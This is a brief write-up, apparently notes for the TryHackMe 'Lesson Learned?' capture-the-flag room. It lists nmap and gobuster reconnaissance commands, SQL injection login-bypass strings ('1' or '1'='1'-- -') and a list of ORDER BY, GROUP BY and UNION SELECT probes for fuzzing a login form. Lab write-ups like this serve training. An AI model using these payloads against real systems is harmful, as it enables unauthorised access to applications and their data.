Lesson Learned?
Room Link: https://tryhackme.com/room/lessonlearned
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Browser
Username: 1' or '1'='1'-- -
Password: 1' or '1'='1'-- -
Option #1
Used this page to collect possible injections
List
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -
Add list above as payload in position 1 and 2
Browser
Username: 1' UNION SELECT null-- -
Password: 1' GROUP BY 2--+
Last updated